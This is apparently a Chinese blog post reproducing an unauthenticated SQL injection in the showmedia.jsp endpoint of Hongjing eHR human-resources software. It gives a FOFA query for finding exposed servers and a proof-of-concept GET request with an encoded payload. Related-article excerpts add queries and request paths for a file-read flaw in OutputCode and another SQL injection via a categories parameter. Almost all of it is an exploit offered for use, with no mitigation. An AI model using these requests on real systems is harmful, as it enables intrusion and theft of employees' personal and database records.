首页 > 数据库 >宏景eHR showmedia.jsp SQL注入漏洞复现

宏景eHR showmedia.jsp SQL注入漏洞复现

时间:2024-05-28 14:58:00浏览次数:43  
标签:宏景 eHR 漏洞 showmedia SQL jsp

0x01 产品简介

宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。

0x02 漏洞概述

宏景eHR showmedia.jsp 接口处存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。

0x03 复现环境

FOFA:app="HJSOFT-HCM"

0x04 漏洞复现

PoC

GET /train/resource/course/showmedia.jsp?a_code&r5100=RzvoYYlxoMjNIPAATTP2HJBPAATTPGGqY4XJPloJ5D5mnYCLz

标签:宏景,eHR,漏洞,showmedia,SQL,jsp
From: https://blog.csdn.net/qq_41904294/article/details/139266217

相关文章

  • 宏景eHR-OutputCode存在任意文件读取漏洞
    漏洞描述宏景eHR是一种企业人力资源管理系统,该漏洞存在于'OutputCode'模块中,该模块未能正确验证用户输入的文件路径参数'path'。由于缺乏充分的输入校验和路径处理,攻击者可以通过构造恶意的'path'参数,读取服务器上的任意文件fofaapp="HJSOFT-HCM"POCGET/servlet/OutputCode?......
  • 【漏洞复现】宏景人力资源信息管理系统 showmediainfo SQL注入漏洞
    免责声明:文章来源互联网收集整理,文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者......
  • 【漏洞复现】宏景人力资源信息管理系统 DisplayExcelCustomReport 任意文件读取漏洞
    免责声明:文章来源互联网收集整理,文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者......
  • 制造工厂的人事管理痛点是什么?eHR人事管理系统来解决!
    制造工厂作为国家经济最重要的部门具有特殊属性:员工数量众多,流动频繁,基层员工能力素质难以保障。随着工业机器人,工业信息化的普及,传统的人力资源管理模式已迎来瓶颈,加之,经常面临人力、土地、原材料等高成本,制造工厂急需转型升级!究竟有何痛点?eHR人事管理系统又会如何解决?......
  • CF741E Arpa’s abnormal DNA and Mehrdad’s deep interest
    我永远喜欢数据结构。感觉\(\color{maroon}*3400\)虚高,但是第一眼不会做/ng。太菜了。CF洛谷给出两个字符串\(s,t\),记\(r_i\)表示在\(s_i\)和\(s_{i+1}\)插入\(t\)得到的字符串。若\(i=0\)表示在开头插入,若\(i=|s|\)表示在结尾插入。形式化的,\(r_i=\ov......
  • 基于Java和Vue开发的企业Ehr数智化人力管理系统源码+配套文档(提升人力资源管理效率的
    写在前面:随着企业规模的不断扩大和人力资源管理的日益复杂,传统的人力资源管理方式已经无法满足现代企业的需求。为了提高管理效率、优化资源配置、降低人力成本,越来越多的企业开始引入eHR人力资源管理系统。本文将重点介绍eHR系统在招聘管理、人事管理、考勤管理、绩效管理、社保......
  • 基于Java+Vue开发的企业Ehr数智化人力管理系统源码+配套文档(提升人力资源管理效率的利
    写在前面:随着企业规模的不断扩大和人力资源管理的日益复杂,传统的人力资源管理方式已经无法满足现代企业的需求。为了提高管理效率、优化资源配置、降低人力成本,越来越多的企业开始引入eHR人力资源管理系统。本文将重点介绍eHR系统在招聘管理、人事管理、考勤管理、绩效管理、社保......
  • 题解 CF741E Arpa’s abnormal DNA and Mehrdad’s deep interest
    CF741EArpa’sabnormalDNAandMehrdad’sdeepinterest记\(R_{i}\)表示把\(T\)插入在\(S\)的第\(i\)位后组成的字符串。有\(q\)组询问,给定\((x,y,l,r)\),求\(\min_{i}R_{i},({i\in[l,r],i\%k\in[x,y]})\)。一个暴力的想法是先把\(R_{i}\)的排名求出来,这显......
  • 具有高速开关、RGW80TS65EHRC11、RGW80TS65HRC11、RGW60TS65CHRC11 650V场终止沟槽型I
    1、应用太阳能逆变器UPS焊接IH功率因数校正2、规格1、RGW80TS65EHRC11IGBT沟槽型场截止650V通孔TO-247NIGBT类型:沟槽型场截止电压-集射极击穿(最大值):650V电流-集电极(Ic)(最大值):80A电流-集电极脉冲(Icm):160A不同 Vge、Ic时 Vce(on)(最大值):1.9V@15V,40A功率......
  • 宏景HCM SQL注入漏洞复现(CNVD-2023-08743)
    漏洞概述宏景HCM存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。影响范围宏景HCM<8.2漏洞复现fofa语法:FOFA:body='<divclass="hj-hy-all-one-logo"'鹰图语法:app.name="宏景HCM"POC:(注入点是categories字段)/servlet/codes......